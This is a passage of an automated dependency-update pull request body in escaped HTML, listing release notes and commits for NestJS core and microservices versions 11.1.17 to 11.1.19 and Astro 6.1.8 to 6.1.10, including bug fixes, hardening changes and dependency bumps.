href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eyoumoo (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev11.1.17 (2026-03-16)\u003c/h2\u003e\n\u003ch4\u003eEnhancements\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16218\"\u003e#16218\u003c/a\u003e feat(microservices): add redis driver identification (\u003ca href=\"https://github.com/vchomakov\"\u003e\u003ccode\u003e@​vchomakov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eBugs\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eauto-run middleware for HEAD requests as fastify redirects them to GET handlers (effectively skipping middleware execution) \u003ca href=\"https://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\"\u003ehttps://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\u003c/a\u003e (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecommon\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16567\"\u003e#16567\u003c/a\u003e fix(deps): update dependency file-type to v21.3.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16533\"\u003e#16533\u003c/a\u003e fix(deps): update dependency fastify to v5.8.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRohan Santhosh Kumar (\u003ca href=\"https://github.com/Rohan5commit\"\u003e\u003ccode\u003e@​Rohan5commit\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eVasil Chomakov (\u003ca href=\"https://github.com/vchomakov\"\u003e\u003ccode\u003e@​vchomakov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/3c1cc5f91e95fcec27c3694cd42a08a50e85cc5f\"\u003e\u003ccode\u003e3c1cc5f\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.18 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/0f962c75a474b08fbc1bdf072b89eda14151c856\"\u003e\u003ccode\u003e0f962c7\u003c/code\u003e\u003c/a\u003e fix(core): sanitize sse message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/94aa4242f622d6f6b071c35dbcd90e0f2f3f32de\"\u003e\u003ccode\u003e94aa424\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://github.com/nestjs/nest/tree/HEAD/packages/core/issues/16679\"\u003e#16679\u003c/a\u003e from nestjs/renovate/path-to-regexp-8.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/368691c35fa221b68baad8d4e569d9d8685c0ea1\"\u003e\u003ccode\u003e368691c\u003c/code\u003e\u003c/a\u003e fix(core): prevent injector hang when design:paramtypes is missing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/25d4fdef37ac20930cc66b1283267651631e26f8\"\u003e\u003ccode\u003e25d4fde\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/5c0b11e20c35c0a5692c16187519982091d57150\"\u003e\u003ccode\u003e5c0b11e\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/f7d4460f0b34bd4a70be4552c3ca9e11eaecdb8c\"\u003e\u003ccode\u003ef7d4460\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://github.com/nestjs/nest/tree/HEAD/packages/core/issues/16637\"\u003e#16637\u003c/a\u003e from JakobStaudinger/moduleref-create-transient-sco...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/d0a9dc97acba4ae7b33d9a46d8941f4ad6b3b914\"\u003e\u003ccode\u003ed0a9dc9\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/46774340b61d8e5751b13ba95a27628267266be3\"\u003e\u003ccode\u003e4677434\u003c/code\u003e\u003c/a\u003e feat(core): export \u003ccode\u003eIEntryNestModule\u003c/code\u003e type\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/7493b94647fc51d6d774f1e20f1b2f66c692182f\"\u003e\u003ccode\u003e7493b94\u003c/code\u003e\u003c/a\u003e fix(core): dependency injection edge case with moduleref.create\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nestjs/nest/commits/v11.1.18/packages/core\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@nestjs/microservices` from 11.1.8 to 11.1.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nestjs/nest/releases\"\u003e@​nestjs/microservices's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev11.1.19 (2026-04-13)\u003c/h2\u003e\n\u003ch4\u003eBug fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16762\"\u003e#16762\u003c/a\u003e fix(microservices): use backing field for consumer CRASH event listener (\u003ca href=\"https://github.com/burhanharoon\"\u003e\u003ccode\u003e@​burhanharoon\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16764\"\u003e#16764\u003c/a\u003e fix(microservices): prevent stack overflow in jsonsocket.handledata() (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 2\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBurhan Haroon⚡ (\u003ca href=\"https://github.com/burhanharoon\"\u003e\u003ccode\u003e@​burhanharoon\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev11.1.18 (2026-04-03)\u003c/h2\u003e\n\u003ch4\u003eBug fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16675\"\u003e#16675\u003c/a\u003e fix(microservices): preserve packet headers in nats serializer (\u003ca href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16683\"\u003e#16683\u003c/a\u003e fix(core): prevent injector hang when design:paramtypes is missing (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16637\"\u003e#16637\u003c/a\u003e fix(core): dependency injection edge case with moduleref.create (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16686\"\u003enestjs/nest#16686\u003c/a\u003e fix(core): sanitize sse message\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecore\u003c/code\u003e, \u003ccode\u003eplatform-express\u003c/code\u003e, \u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16679\"\u003e#16679\u003c/a\u003e fix(deps): update dependency path-to-regexp to v8.4.2 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16623\"\u003e#16623\u003c/a\u003e fix(deps): update dependency fastify to v5.8.4 (\u003ca href=\"https://github.com/apps/renovate\"\u003e\u003ccode\u003e@​renovate[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eplatform-ws\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16618\"\u003e#16618\u003c/a\u003e chore(deps): bump ws from 8.19.0 to 8.20.0 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecommon\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16619\"\u003e#16619\u003c/a\u003e chore(deps): bump file-type from 21.3.3 to 21.3.4 (\u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAnkit San (\u003ca href=\"https://github.com/ankitbelal\"\u003e\u003ccode\u003e@​ankitbelal\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eJakob Staudinger (\u003ca href=\"https://github.com/JakobStaudinger\"\u003e\u003ccode\u003e@​JakobStaudinger\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKamil Mysliwiec (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKrishna Chaitanya (\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMK (\u003ca href=\"https://github.com/wwenrr\"\u003e\u003ccode\u003e@​wwenrr\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eyoumoo (\u003ca href=\"https://github.com/Youmoo\"\u003e\u003ccode\u003e@​Youmoo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev11.1.17 (2026-03-16)\u003c/h2\u003e\n\u003ch4\u003eEnhancements\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emicroservices\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/nestjs/nest/pull/16218\"\u003e#16218\u003c/a\u003e feat(microservices): add redis driver identification (\u003ca href=\"https://github.com/vchomakov\"\u003e\u003ccode\u003e@​vchomakov\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eBugs\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eplatform-fastify\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eauto-run middleware for HEAD requests as fastify redirects them to GET handlers (effectively skipping middleware execution) \u003ca href=\"https://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\"\u003ehttps://github.com/nestjs/nest/commit/cbdf737cd6e7cefa52d05ecea2ae4af95c464614\u003c/a\u003e (\u003ca href=\"https://github.com/kamilmysliwiec\"\u003e\u003ccode\u003e@​kamilmysliwiec\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/67309956821c0626c050fe6725c90645d2577e3d\"\u003e\u003ccode\u003e6730995\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.19 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/bcc036d2f4e134f15c285e2348be6e5d24a1bde8\"\u003e\u003ccode\u003ebcc036d\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://github.com/nestjs/nest/tree/HEAD/packages/microservices/issues/16762\"\u003e#16762\u003c/a\u003e from burhanharoon/fix/kafka-consumer-crash-event-li...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/d3deafe1e9cdf3537de86df83e4c3605b3bd8a63\"\u003e\u003ccode\u003ed3deafe\u003c/code\u003e\u003c/a\u003e chore: remove redundant comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/298857e2c2eacd6e34ceeb59db31afe321c8fc00\"\u003e\u003ccode\u003e298857e\u003c/code\u003e\u003c/a\u003e fix(microservices): prevent stack overflow in jsonsocket.handledata()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/77063fb39a331446db4d8d8f5c4d7d6e7c4cee1a\"\u003e\u003ccode\u003e77063fb\u003c/code\u003e\u003c/a\u003e fix(microservices): use backing field for consumer crash event listener\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/3c1cc5f91e95fcec27c3694cd42a08a50e85cc5f\"\u003e\u003ccode\u003e3c1cc5f\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.18 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/848a6fb9ae70a486d018154dd02d8ad7ef37ab1b\"\u003e\u003ccode\u003e848a6fb\u003c/code\u003e\u003c/a\u003e fix(microservices): escape msvc pattern keys\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/9e6774bdbd2541a1ac8d216387294814046c9388\"\u003e\u003ccode\u003e9e6774b\u003c/code\u003e\u003c/a\u003e fix(microservices): preserve packet headers in nats serializer\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/5a05f52c4368157219ea15c30ba881d9ddd64bd9\"\u003e\u003ccode\u003e5a05f52\u003c/code\u003e\u003c/a\u003e chore: update readme\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nestjs/nest/commit/447a373ebebd2c58b5b3c8d718f25922a025f2fe\"\u003e\u003ccode\u003e447a373\u003c/code\u003e\u003c/a\u003e chore(release): publish v11.1.17 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nestjs/nest/commits/v11.1.19/packages/microservices\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `astro` from 5.17.3 to 6.1.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/withastro/astro/releases\"\u003eastro's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eastro@6.1.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16479\"\u003e#16479\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1058428df2d13878c6130787636dd1778273a934\"\u003e\u003ccode\u003e1058428\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious \u003ccode\u003e[WARN] [content] Content config not loaded\u003c/code\u003e warning during \u003ccode\u003eastro dev\u003c/code\u003e for projects that don't use content collections\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16457\"\u003e#16457\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd\"\u003e\u003ccode\u003e3d82220\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens server island encryption to prevent encrypted data from one island component being replayed against a different one\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16481\"\u003e#16481\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/152700e08178285b240d8ef947cccd47b870ee5f\"\u003e\u003ccode\u003e152700e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes a spurious 404 request for a dev toolbar sourcemap during \u003ccode\u003eastro dev\u003c/code\u003e caused by the browser mis-resolving a relative \u003ccode\u003esourceMappingURL\u003c/code\u003e from the \u003ccode\u003e/@id/\u003c/code\u003e URL prefix\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16480\"\u003e#16480\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/1bcb43bf04f3fa8f4623897ae2a937250f35216a\"\u003e\u003ccode\u003e1bcb43b\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Fixes an unnecessary full page reload on first navigation during dev\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eastro@6.1.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16448\"\u003e#16448\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Updates vite, picomatch, and unstorage to latest patch versions\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16422\"\u003e#16422\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a3951d7873c7c210fedbaa77702bc33db6410715\"\u003e\u003ccode\u003ea3951d7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens \u003ccode\u003eastro-island\u003c/code\u003e export resolution and hydration error handling for malformed component metadata\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16420\"\u003e#16420\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/e21de1d03b318d5045dba718291c04fe05c01490\"\u003e\u003ccode\u003ee21de1d\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens Astro's error overlay and server logging paths to avoid unsafe HTML insertion and format-string interpolation\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16419\"\u003e#16419\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/matthewp\"\u003e\u003ccode\u003e@​matthewp\u003c/code\u003e\u003c/a\u003e! - Hardens nested object and package metadata lookups to ignore prototype keys in content handling and project scaffolding\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16022\"\u003e#16022\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a002540d60d4a840db9971e73c820a8015658ffe\"\u003e\u003ccode\u003ea002540\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mathieumaf\"\u003e\u003ccode\u003e@​mathieumaf\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where i18n domains would return 404 when \u003ccode\u003etrailingSlash\u003c/code\u003e is set to \u003ccode\u003enever\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies [\u003ca href=\"https://github.com/withastro/astro/commit/99464edb5fc0968f6497328e106f26ab393668bd\"\u003e\u003ccode\u003e99464ed\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/withastro/astro/commit/f3485c3458bc8bf70c152126e418c24f489ded9d\"\u003e\u003ccode\u003ef3485c3\u003c/code\u003e\u003c/a\u003e]:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/internal-helpers\u003c/code\u003e\u003ca href=\"https://github.com/0\"\u003e\u003ccode\u003e@​0\u003c/code\u003e\u003c/a\u003e.9.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​astrojs/markdown-remark\u003c/code\u003e\u003ca href=\"https://github.com/7\"\u003e\u003ccode\u003e@​7\u003c/code\u003e\u003c/a\u003e.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eastro@6.1.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16367\"\u003e#16367\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/a6866a7ef086627f8f8237274361d8acc2f85121\"\u003e\u003ccode\u003ea6866a7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Fixes an issue where build output files could contain special characters (\u003ccode\u003e!\u003c/code\u003e, \u003ccode\u003e~\u003c/code\u003e, \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e}\u003c/code\u003e) in their names, causing deploy failures on platforms like Netlify.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16381\"\u003e#16381\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/217c5b3b937f0aee7e59280e8a10cf2bd4237605\"\u003e\u003ccode\u003e217c5b3\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ematipico\"\u003e\u003ccode\u003e@​ematipico\u003c/code\u003e\u003c/a\u003e! - Slightly improved the performance of the dev server by caching the internal crawling of the dependencies of a project.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16348\"\u003e#16348\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/7d26cd77bc1b33cee81f0e7b408dc2d170be1bdd\"\u003e\u003ccode\u003e7d26cd7\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/ocavue\"\u003e\u003ccode\u003e@​ocavue\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where emitted assets during a client build would contain always fresh, new hashes in their name. Now the build should be more stable.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Fixes a bug where \u003ccode\u003eallowedDomains\u003c/code\u003e weren't correctly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16379\"\u003e#16379\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5a845514114ae21ca9820e98b56cce33c0cf579b\"\u003e\u003ccode\u003e5a84551\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/martrapp\"\u003e\u003ccode\u003e@​martrapp\u003c/code\u003e\u003c/a\u003e! - Improves Vue scoped style handling in DEV mode during client router navigation.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16317\"\u003e#16317\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/d012bfeadb5b33f9ab1175191d59357d629c327e\"\u003e\u003ccode\u003ed012bfe\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/das-peter\"\u003e\u003ccode\u003e@​das-peter\u003c/code\u003e\u003c/a\u003e! - Adds tests to verify settings are properly propagated when using the development server.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/withastro/astro/pull/16282\"\u003e#16282\u003c/a\u003e \u003ca href=\"https://github.com/withastro/astro/commit/5b0fdaa8ba3dc17f4b93d9847c3255150b0aeab2\"\u003e\u003ccode\u003e5b0fdaa\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jmurty\"\u003e\u003ccode\u003e@​jmurty\u003c/code\u003e\u003c/a\u003e! - Fixes build errors on platforms with skew protection enabled (e.g. Vercel, Netlify) for inter-chunk Javascript using dynamic 